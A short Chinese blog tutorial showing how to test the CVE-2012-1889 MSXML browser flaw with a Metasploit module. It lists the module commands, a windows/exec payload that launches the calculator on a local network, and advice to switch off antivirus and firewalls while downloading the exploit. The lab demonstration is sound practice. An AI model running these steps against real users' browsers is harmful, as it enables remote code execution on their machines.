Metasploit测试暴雷漏洞 (编号CVE-2012-1889)

漏洞测试原理和上一篇博文里面的CVE-2012-1875基本一致。
详细步骤:
1. 在exploit-db中寻找漏洞相关的rb文件,(注意:在下载的时候记得关闭各种360以及电脑管家和电脑自带防火墙,不然会有病毒报错),下载地址:https://www.exploit-db.com/exploits/19186/
2. 把down好的.rb文件放置在
C:\metasploit\apps\pro\msf3\modules\exploits\derrickzhou中,这个时候可以在exploits文件夹下新建一个子文件夹。(必须是放在exploit文件夹下)
3. 打开Metasploit Pro Console,等待出现msf指令。
4. 依次输入指令:use exploits/derrickzhou/cve-2012-1889(或者在msf指令里直接敲入 use exploit/windows/browser/msxml_get_definition_code_exec 参考:http://www.rapid7.com/db/modules/exploit/windows/browser/msxml_get_definition_code_exec),set PAYLOAD windows/exec,set CMD calc,set SRVHOST 192.168.244.1(局域网中自己机器的ip),最后我们再show options,会出现:
Metasploit测试暴雷漏洞 (编号CVE-2012-1889)_第1张图片
5. 敲下exploit,会出现:
Metasploit测试暴雷漏洞 (编号CVE-2012-1889)_第2张图片
6. 在浏览器中输入Using URL就可以完成测试了。
Metasploit测试暴雷漏洞 (编号CVE-2012-1889)_第3张图片
Metasploit测试暴雷漏洞 (编号CVE-2012-1889)_第4张图片
入侵完成。启动计算器。

你可能感兴趣的:(漏洞)